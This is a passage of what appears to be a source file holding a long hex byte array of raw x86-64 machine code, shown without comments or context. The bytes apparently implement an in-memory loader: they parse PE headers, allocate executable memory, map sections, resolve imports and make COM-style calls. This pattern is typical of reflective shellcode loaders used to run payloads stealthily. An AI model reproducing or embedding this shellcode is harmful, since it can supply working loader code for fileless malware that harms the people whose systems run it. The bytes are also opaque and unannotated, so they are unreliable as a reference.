338 0x08, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x45,
339 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xff,
340 0xd3, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b,
341 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b,
342 0x45, 0xec, 0x39, 0xc2, 0x77, 0x91, 0xeb, 0x69, 0x66, 0xc7, 0x45, 0x30,
343 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
344 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
345 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
346 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
347 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x98, 0x90, 0x00, 0x00, 0x00, 0x48,
348 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00,
349 0x00, 0x48, 0x8d, 0x55, 0xea, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89,
350 0xc1, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8,
351 0x48, 0x89, 0xc1, 0xff, 0xd3, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00,
352 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00,
353 0x00, 0x00, 0x4c, 0x8d, 0x45, 0x30, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b,
354 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x66, 0xc7, 0x45, 0x10, 0x01,
355 0x00, 0x48, 0xc7, 0x45, 0x18, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
356 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48,
357 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00,
358 0x00, 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55,
359 0xc0, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55,
360 0x20, 0x48, 0x89, 0x55, 0xd0, 0x4c, 0x8d, 0x4d, 0xf0, 0x4c, 0x8b, 0x85,
361 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc0, 0xff, 0xd0, 0x89, 0x85,
362 0xac, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00,
363 0x0f, 0x84, 0xf3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00,
364 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x38,
365 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00,
366 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00,
367 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xe9, 0xbd, 0x02, 0x00, 0x00,
368 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x38, 0x00,
369 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
370 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b,
371 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x04, 0x00, 0x00,
372 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00,
373 0x48, 0x83, 0xbd, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00,
374 0x00, 0x00, 0x00, 0xe9, 0x72, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
375 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b,
376 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x06, 0x00, 0x00,
377 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00, 0x00,
378 0x48, 0x83, 0xbd, 0x98, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x1d, 0x02,
379 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40,
380 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
381 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x30, 0x48, 0x8b,
382 0x95, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x48, 0x8b, 0x95,
383 0xa0, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00,
384 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xbc, 0x01, 0x00,
385 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
386 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x04, 0x08, 0x00,
387 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xfa, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
388 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
389 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00,
390 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00,
391 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x83,
392 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xbb, 0x00, 0x00, 0x00,
393 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x97, 0x00, 0x00, 0x00,
394 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00,
395 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2, 0x48, 0x83, 0xc2, 0x04, 0x48,
396 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48, 0x8b, 0x95, 0xb0, 0x00, 0x00,
397 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x89, 0xd1, 0xff,
398 0xd0, 0x48, 0x89, 0x45, 0x78, 0x66, 0xc7, 0x45, 0x70, 0x08, 0x00, 0x48,
399 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00, 0x00,
400 0x00, 0x4c, 0x8d, 0x45, 0x70, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b, 0x8d,
401 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00,
402 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x79, 0x25, 0x48, 0x8b, 0x85,
403 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48,
404 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
405 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
406 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b, 0x85, 0xb0, 0x00,
407 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x39,
408 0xc2, 0x0f, 0x87, 0x51, 0xff, 0xff, 0xff, 0x83, 0xbd, 0xac, 0x00, 0x00,
409 0x00, 0x00, 0x0f, 0x88, 0x95, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8,
410 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, 0x48, 0x8b,
411 0x80, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00,
412 0x48, 0x8b, 0x4a, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55, 0xc0,
413 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55, 0x20,
414 0x48, 0x89, 0x55, 0xd0, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x4c,
415 0x8d, 0x45, 0x50, 0x4c, 0x89, 0x44, 0x24, 0x30, 0x4c, 0x8b, 0x85, 0xb8,
416 0x00, 0x00, 0x00, 0x4c, 0x89, 0x44, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0xc0,
417 0x4c, 0x89, 0x44, 0x24, 0x20, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41,
418 0xb8, 0x18, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00,
419 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x74, 0x1a, 0x48,
420 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00,
421 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff,
422 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8,
423 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x48, 0x89,
424 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b,
425 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x00, 0x00, 0x00,
426 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81,
427 0xc4, 0x48, 0x01, 0x00, 0x00, 0x5b, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
428 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
429 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74,
430 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00,
431 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x30,
432 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40,
433 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40,
434 0x38, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
435 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55,
436 0x18, 0x48, 0x8b, 0x52, 0x38, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
437 0x45, 0x18, 0x48, 0xc7, 0x40, 0x38, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
438 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48,
439 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b,
440 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x28, 0x48, 0x89,
441 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x28, 0x00,
442 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48,
443 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20,
444 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48,
445 0x8b, 0x52, 0x20, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18,
446 0x48, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
447 0x48, 0x8b, 0x40, 0x18, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45,
448 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10,
449 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x89, 0xd1, 0xff,
450 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00,
451 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x85, 0xc0,
452 0x74, 0x44, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
453 0x00, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52,
454 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
455 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55,
456 0x18, 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
457 0x45, 0x18, 0x48, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
458 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48,
459 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b,
460 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x08, 0x48, 0x89,
461 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00,
462 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x85,
463 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b,
464 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x12,
465 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00,
466 0x00, 0x00, 0x00, 0x00, 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
467 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb,
468 0x0a, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45, 0x18, 0x01, 0x48,
469 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x12, 0x48, 0x8b,
470 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00,
471 0x38, 0xc2, 0x74, 0xd9, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x0f,
472 0xb6, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x0f, 0xb6, 0xc0,
473 0x29, 0xc2, 0x89, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0xd0, 0x01,
474 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
475 0x8d, 0x60, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x08, 0x01, 0x00, 0x00,
476 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x10, 0x01, 0x00, 0x00, 0x00,
477 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x31, 0xc0, 0x48, 0x79, 0xc7, 0x45,
478 0xa4, 0x1b, 0x8b, 0x44, 0x24, 0xc7, 0x45, 0xa8, 0x04, 0x8b, 0x4c, 0x24,
479 0xc7, 0x45, 0xac, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x45, 0xb0, 0x0c, 0x52,
480 0x81, 0xc2, 0xc7, 0x45, 0xb4, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xb8,
481 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x45, 0xbc, 0xf4, 0xff, 0xd0, 0xc3, 0xc7,
482 0x45, 0xc0, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x45, 0xc4, 0x01, 0x00, 0x00,
483 0x48, 0xc7, 0x45, 0xc8, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x45, 0xcc, 0x01,
484 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd0, 0x89, 0x9c, 0x24, 0x38, 0xc7, 0x45,
485 0xd4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd8, 0x89, 0xbc, 0x24, 0x20,
486 0xc7, 0x45, 0xdc, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe0, 0x89, 0xb4,
487 0x24, 0x28, 0xc7, 0x45, 0xe4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe8,
488 0x89, 0xe6, 0x48, 0x89, 0xc7, 0x45, 0xec, 0xcf, 0xb8, 0x00, 0x02, 0xc7,
489 0x45, 0xf0, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x45, 0xf4, 0xc1, 0x48, 0x8d,
490 0x14, 0xc7, 0x45, 0xf8, 0x01, 0x4c, 0x8d, 0x04, 0xc7, 0x45, 0xfc, 0x02,
491 0x4d, 0x8d, 0x0c, 0xc7, 0x45, 0x00, 0x00, 0x49, 0x8d, 0x1c, 0xc7, 0x45,
492 0x04, 0x01, 0x48, 0x89, 0x9c, 0xc7, 0x45, 0x08, 0x24, 0x00, 0x01, 0x00,
493 0xc7, 0x45, 0x0c, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x45, 0x10, 0x48, 0x89,
494 0x9c, 0x24, 0xc7, 0x45, 0x14, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x45, 0x18,
495 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x45, 0x1c, 0x89, 0x9c, 0x24, 0x10, 0xc7,
496 0x45, 0x20, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x24, 0x01, 0xc3, 0x48,
497 0x89, 0xc7, 0x45, 0x28, 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x45, 0x2c, 0x00,
498 0x00, 0xff, 0xd7, 0xc7, 0x45, 0x30, 0x48, 0x89, 0xf4, 0x48, 0xc7, 0x45,
499 0x34, 0x8b, 0xb4, 0x24, 0x28, 0xc7, 0x45, 0x38, 0x01, 0x00, 0x00, 0x48,
500 0xc7, 0x45, 0x3c, 0x8b, 0xbc, 0x24, 0x20, 0xc7, 0x45, 0x40, 0x01, 0x00,
501 0x00, 0x48, 0xc7, 0x45, 0x44, 0x8b, 0x9c, 0x24, 0x38, 0xc7, 0x45, 0x48,
502 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x4c, 0x8b, 0xac, 0x24, 0x30, 0xc7,
503 0x45, 0x50, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x54, 0x81, 0xc4, 0x48,
504 0x01, 0xc7, 0x45, 0x58, 0x00, 0x00, 0xc3, 0x00, 0x48, 0x8b, 0x85, 0x60,
505 0x01, 0x00, 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
506 0x75, 0x16, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48,
507 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0xeb, 0x15,
508 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07,
509 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
510 0x18, 0x01, 0x00, 0x00, 0x48, 0x05, 0x18, 0x19, 0x00, 0x00, 0x48, 0x89,
511 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
512 0x48, 0x89, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x00,
513 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x00,
514 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xf0, 0x00, 0x00,
515 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x40,
516 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x00,
517 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85,
518 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x8b,
519 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00,
520 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b,
521 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x50, 0x04, 0x48, 0x8b, 0x85,
522 0xd8, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x04, 0x66, 0x39, 0xc2, 0x0f,
523 0x85, 0xa1, 0x06, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00,
524 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xf0, 0x00, 0x00, 0x00, 0x8b,
525 0x52, 0x50, 0x81, 0xc2, 0x00, 0x10, 0x00, 0x00, 0x89, 0xd2, 0x41, 0xb9,
526 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00,
527 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x08, 0x01, 0x00, 0x00,
528 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x5f, 0x06,
529 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40,
530 0x14, 0x0f, 0xb7, 0xd0, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48,
531 0x01, 0xd0, 0x48, 0x83, 0xc0, 0x18, 0x48, 0x89, 0x85, 0xd0, 0x00, 0x00,
532 0x00, 0xc7, 0x85, 0x24, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9,
533 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x24, 0x01, 0x00, 0x00, 0x48, 0x89,
534 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03,
535 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x01,
536 0xd0, 0x8b, 0x40, 0x10, 0x41, 0x89, 0xc0, 0x8b, 0x95, 0x24, 0x01, 0x00,
537 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48,
538 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00,
539 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x14, 0x89, 0xc2, 0x48, 0x8b, 0x85,
540 0x00, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x8b, 0x95, 0x24, 0x01,
541 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0,
542 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00,
543 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b,
544 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0xca, 0x48,
545 0x89, 0xc1, 0xe8, 0x4d, 0x20, 0x00, 0x00, 0x83, 0x85, 0x24, 0x01, 0x00,
546 0x00, 0x01, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40,
547 0x06, 0x0f, 0xb7, 0xc0, 0x3b, 0x85, 0x24, 0x01, 0x00, 0x00, 0x0f, 0x87,
548 0x4c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b,
549 0x80, 0x90, 0x00, 0x00, 0x00, 0x89, 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b,
550 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00,
551 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0xe9, 0x39,
552 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x40,
553 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01,
554 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60,
555 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x95, 0xc0, 0x00,
556 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00,
557 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89,
558 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
559 0x89, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00,
560 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00,
561 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x40, 0x01, 0x00, 0x00, 0x48,
562 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
563 0x0f, 0x84, 0xa9, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x40, 0x01, 0x00,
564 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48,
565 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x79, 0x30, 0x48,
566 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b,
567 0x95, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x12, 0x0f, 0xb7, 0xd2, 0x48,
